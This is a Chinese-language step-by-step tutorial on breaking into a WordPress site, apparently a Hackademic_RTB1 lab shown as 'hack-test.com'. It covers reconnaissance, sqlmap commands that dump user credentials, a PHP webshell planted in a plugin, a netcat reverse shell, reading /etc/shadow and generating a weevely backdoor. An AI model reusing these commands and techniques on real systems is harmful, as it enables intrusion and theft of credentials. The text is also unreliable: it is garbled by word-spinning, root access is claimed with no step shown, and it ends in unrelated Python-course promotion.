现在我们获取了网站做事器的IP地址为:173.236.138.113

探求同一做事器上的其它网站,我们利用sameip.org.

我们须要关于你网站的以下信息:

jsp网站破解资深黑客教小白若何攻破一个网站超等具体的教授教养教程太牛逼了 Docker

DNS records (A, NS, TXT, MX and SOA)

Web Server Type (Apache, IIS, Tomcat)

Registrar (the company that owns your domain)

Your name, address, email and phone

Scripts that your site uses (php, asp, asp.net, jsp, cfm)

Your server OS (Unix,Linux,Windows,Solaris)

Your server open ports to internet (80, 443, 21, etc.)

让我们开始找你网站的DNS记录,我们用who.is来完成这一目标.

我们创造你的DNS记录如下

让我们来确定web做事器的类型

我们现在已经获取了你的网站域名的注册信息,包括你的主要信息等.

我们可以通过backtrack5中的whatweb来获取你的网站做事器操作系统类型和做事器的版本.

我们创造你的网站利用了著名的php整站程序wordpress,做事器的的系统类型为FedoraLinux,Web做事器版本Apache 2.2.15.连续查看网站做事器开放的端口,用渗透测试工具nmap:

1-Find services that run on server(查看做事器上运行的做事)

2-Find server OS(查看操作系统版本)

我们也会用到Backtrack 5 R1中的W3AF 工具:

root@bt:/pentest/web/w3af#./w3af_gui

我们输入要检测的网站地址,选择完全的安全审计选项.

稍等一会,你将会看到扫描结果.

创造你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来磋商SQL注入漏洞.

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

我们通过工具创造这个URL存在SQL注入,我们通过Sqlmap来检测这个url.

Using sqlmap with –u url

过一会你会看到

输入N按回车键连续

我们创造你的网站存在mysql显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来考试测验采集数据库名.

创造三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名

通过参数“-T wp_users –columns ”来查看wp_users表中的字段.

接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”

我们会创造用户名和密码hashes值. 我们须要通过以下在线破解网站来破解密码hashes

http://www.onlinehashcrack.com/free-hash-reverse.php

上岸wordpress的后台wp-admin

考试测验上传php webshell到做事器,以方便运行一些linux命令.在插件页面探求任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.

Phpwebshell被解析了,我们可以掌握你网站的文件,但是我们只希望得到网站做事器的root权限,来入侵做事器上其它的网站。

我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.

然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.

点击连接我们会看到

接下来我们考试测验实行一些命令:

id

uid=48(apache) gid=489(apache) groups=489(apache)

(用来显示用户的id和组)

pwd

/var/www/html/Hackademic_RTB1/wp-content/plugins

(显示做事器上当前的路径)

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

(显示内核版本信息)

实行完成之后我们输入id命令

id

我们创造我们已经是root权限了

uid=0(root) gid=0(root)

现在我们可以查看/etc/shadow文件

cat/etc/shadow

2.用weevely创建一个密码为koko的php后门

root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

接下来上传到做事器之后来利用它

root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

测试我们的hax.php后门

完成,撒花!

“我自己是一名从事了多年开拓的Python老程序员,辞职目前在做自己的Python私人定制课程,今年年初我花了一个月整理了一份最适宜2019年学习的Python学习干货,从最根本的到各种框架都有整理,送给每一位喜好Python小伙伴,想要获取的可以关注我的头条号并在后台私信我:01,即可免费获取。
\公众